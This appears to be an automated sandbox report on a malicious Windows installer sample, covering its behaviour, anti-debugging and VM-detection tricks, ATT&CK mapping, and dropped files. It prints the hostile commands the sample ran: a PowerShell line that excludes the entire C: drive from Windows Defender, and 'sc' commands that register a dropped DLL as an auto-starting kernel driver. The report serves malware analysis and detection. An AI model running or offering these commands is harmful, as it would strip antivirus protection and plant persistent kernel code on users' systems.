Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1868Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CC4AEC0 FindFirstFileA,FindClose,FindClose,7_2_6CC4AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B36868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_00B36868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B37496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_00B37496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B39C60 GetSystemInfo,10_2_00B39C60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: cVyexkZjrG.tmp, 00000002.00000002.2150989458.000000000156E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: cVyexkZjrG.tmp, 00000002.00000002.2150989458.000000000156E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Contains functionality to hide a thread from the debugger
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CAD3886 NtSetInformationThread 00000000,00000011,00000000,000000007_2_6CAD3886
Hides threads from debuggers
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CC60181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_6CC60181
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BB57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_00BB57D0
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CC69D66 mov eax, dword ptr fs:[00000030h]7_2_6CC69D66
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CC69D35 mov eax, dword ptr fs:[00000030h]7_2_6CC69D35
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CC5F17D mov eax, dword ptr fs:[00000030h]7_2_6CC5F17D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CC58CBD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_6CC58CBD
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CC60181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_6CC60181

HIPS / PFW / Operating System Protection Evasion

barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Found driver which could be used to inject code into processes
Source: tProtect.dll.13.drStatic PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpProcess created: C:\Users\user\Desktop\cVyexkZjrG.exe "C:\Users\user\Desktop\cVyexkZjrG.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD27700 cpuid 7_2_6CD27700
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B3AB2A GetSystemTimeAsFileTime,10_2_00B3AB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BD0090 GetVersion,10_2_00BD0090
Source: cVyexkZjrG.tmp, 00000007.00000002.2288553617.0000000000A53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Windows Defender\MsMpEng.exe

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
Windows Service		1
Access Token Manipulation		11
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Service Execution		1
DLL Side-Loading		1
Windows Service		1
Disable or Modify Tools		LSASS Memory431
Security Software Discovery		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Native API		Logon Script (Windows)111
Process Injection		231
Virtualization/Sandbox Evasion		Security Account Manager231
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
DLL Side-Loading		1
Access Token Manipulation		NTDS2
Process Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
Process Injection		LSA Secrets1
Application Window Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Deobfuscate/Decode Files or Information		Cached Domain Credentials2
System Owner/User Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
Obfuscated Files or Information		DCSync3
File and Directory Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Software Packing		Proc Filesystem25
System Information Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
DLL Side-Loading		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1580243 Sample: cVyexkZjrG.exe Startdate: 24/12/2024 Architecture: WINDOWS Score: 88 90 Multi AV Scanner detection for dropped file 2->90 92 Multi AV Scanner detection for submitted file 2->92 94 Found driver which could be used to inject code into processes 2->94 96 Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet 2->96 10 cVyexkZjrG.exe 2 2->10         started        13 cmd.exe 2->13         started        15 cmd.exe 2->15         started        17 30 other processes 2->17 process3 file4 86 C:\Users\user\AppData\...\cVyexkZjrG.tmp, PE32 10->86 dropped 19 cVyexkZjrG.tmp 3 5 10->19         started        23 sc.exe 1 13->23         started        25 sc.exe 1 15->25         started        27 sc.exe 1 17->27         started        29 sc.exe 1 17->29         started        31 sc.exe 1 17->31         started        33 26 other processes 17->33 process5 file6 72 C:\Users\user\AppData\Local\...\update.vac, PE32 19->72 dropped 74 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 19->74 dropped 98 Adds a directory exclusion to Windows Defender 19->98 35 cVyexkZjrG.exe 2 19->35         started        38 powershell.exe 23 19->38         started        41 conhost.exe 23->41         started        43 conhost.exe 25->43         started        45 conhost.exe 27->45         started        47 conhost.exe 29->47         started        49 conhost.exe 31->49         started        51 conhost.exe 33->51         started        53 25 other processes 33->53 signatures7 process8 file9 76 C:\Users\user\AppData\...\cVyexkZjrG.tmp, PE32 35->76 dropped 55 cVyexkZjrG.tmp 4 16 35->55         started        100 Loading BitLocker PowerShell Module 38->100 59 conhost.exe 38->59         started        61 WmiPrvSE.exe 38->61         started        signatures10 process11 file12 78 C:\Users\user\AppData\Local\...\update.vac, PE32 55->78 dropped 80 C:\Program Files (x86)\Windows NT\hrsw.vbc, PE32 55->80 dropped 82 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 55->82 dropped 84 C:\Program Files (x86)\Windows NT\7zr.exe, PE32 55->84 dropped 102 Query firmware table information (likely to detect VMs) 55->102 104 Protects its processes via BreakOnTermination flag 55->104 106 Hides threads from debuggers 55->106 108 Contains functionality to hide a thread from the debugger 55->108 63 7zr.exe 2 55->63         started        66 7zr.exe 7 55->66         started        signatures13 process14 file15 88 C:\Program Files (x86)\...\tProtect.dll, PE32+ 63->88 dropped 68 conhost.exe 63->68         started        70 conhost.exe 66->70         started        process16

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
cVyexkZjrG.exe8%VirustotalBrowse
cVyexkZjrG.exe0%ReversingLabs

Dropped Files

SourceDetectionScannerLabelLink
C:\Program Files (x86)\Windows NT\7zr.exe0%VirustotalBrowse
C:\Program Files (x86)\Windows NT\7zr.exe0%ReversingLabs
C:\Program Files (x86)\Windows NT\hrsw.vbc16%ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll9%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-D54U1.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-D54U1.tmp\update.vac16%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-H0N5U.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-H0N5U.tmp\update.vac16%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUcVyexkZjrG.exefalse
    		high
    https://www.remobjects.com/pscVyexkZjrG.exe, 00000000.00000003.2052689369.00000000029B0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.exe, 00000000.00000003.2053082904.000000007F74B000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000002.00000000.2054654528.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, cVyexkZjrG.tmp, 00000007.00000000.2144559370.000000000033D000.00000020.00000001.01000000.00000008.sdmp, cVyexkZjrG.tmp.6.dr, cVyexkZjrG.tmp.0.drfalse
      		high
      https://www.innosetup.com/cVyexkZjrG.exe, 00000000.00000003.2052689369.00000000029B0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.exe, 00000000.00000003.2053082904.000000007F74B000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000002.00000000.2054654528.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, cVyexkZjrG.tmp, 00000007.00000000.2144559370.000000000033D000.00000020.00000001.01000000.00000008.sdmp, cVyexkZjrG.tmp.6.dr, cVyexkZjrG.tmp.0.drfalse
        		high

        World Map of Contacted IPs

        No contacted IP infos

        General Information

        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1580243
        Start date and time:2024-12-24 06:22:35 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 9m 55s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Run name:Run with higher sleep bypass
        Number of analysed new started processes analysed:108
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Critical Process Termination
        Sample name:cVyexkZjrG.exe
        renamed because original name is a hash value
        Original Sample Name:5A3C5AA184E4FDB2DE4530C18ADB9B12FFC1A101C86CDE8DE13CE49D7A7A2B44.exe
        Detection:MAL
        Classification:mal88.evad.winEXE@135/33@0/0
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 77%
        • Number of executed functions: 28
        • Number of non-executed functions: 76
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
        • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

        Warnings

        • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, SIHClient.exe
        • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
        • Not all processes where analyzed, report is missing behavior information
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size exceeded maximum capacity and may have missing disassembly code.
        • Report size getting too big, too many NtCreateKey calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.

        Simulations

        Behavior and APIs

        No simulations

        Joe Sandbox View / Context

        IPs

        No context

        Domains

        No context

        ASNs

        No context

        JA3 Fingerprints

        No context

        Dropped Files

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        C:\Program Files (x86)\Windows NT\7zr.exe#U5b89#U88c5#U52a9#U624b1.0.3.exeGet hashmaliciousUnknownBrowse
          #U5b89#U88c5#U52a9#U624b1.0.1.exeGet hashmaliciousUnknownBrowse
            #U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousUnknownBrowse
              #U5b89#U88c5#U52a9#U624b1.0.3.exeGet hashmaliciousUnknownBrowse
                #U5b89#U88c5#U52a9#U624b1.0.1.exeGet hashmaliciousUnknownBrowse
                  #U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousUnknownBrowse
                    #U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousUnknownBrowse
                      #U5b89#U88c5#U52a9#U624b_2.0.8.exeGet hashmaliciousUnknownBrowse
                        #U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousUnknownBrowse

                          Created / dropped Files

                          C:\Program Files (x86)\Windows NT\7zr.exe

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp
                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):831200
                          Entropy (8bit):6.671005303304742
                          Encrypted:false
                          SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                          MD5:84DC4B92D860E8AEA55D12B1E87EA108
                          SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                          SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                          SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                          Malicious:false
                          Antivirus:
                          • Antivirus: Virustotal, Detection: 0%, Browse
                          • Antivirus: ReversingLabs, Detection: 0%
                          Joe Sandbox View:
                          • Filename: #U5b89#U88c5#U52a9#U624b1.0.3.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b1.0.1.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b1.0.3.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b1.0.1.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b_2.0.8.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................

                          C:\Program Files (x86)\Windows NT\file.bin (copy)

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp
                          File Type:data
                          Category:dropped
                          Size (bytes):1991296
                          Entropy (8bit):7.999905359856555
                          Encrypted:true
                          SSDEEP:49152:lCxGJwolu3n/E3sZoXRUrXJ6di0cLXchbke51ul:lCJol2c3YeoXJ6dFcLsH1ul
                          MD5:3A3CBB8509F127F9B690DB6D717EFE0B
                          SHA1:75622A50925038691E199C7A7EE95AEF614E4256
                          SHA-256:FDF35E1926622C8577D26B56F52DA00E5791F9098E0E9D45D55FAB26FABEEB60
                          SHA-512:6C37A9339625CE7F92C1E2759E4A3F439C9A637781179F669591E5FF4BA5AE21FE6631ABD27D861BF6659044FD146F8FEC7CE0E936C2C9F222BB51DE8E943650
                          Malicious:false
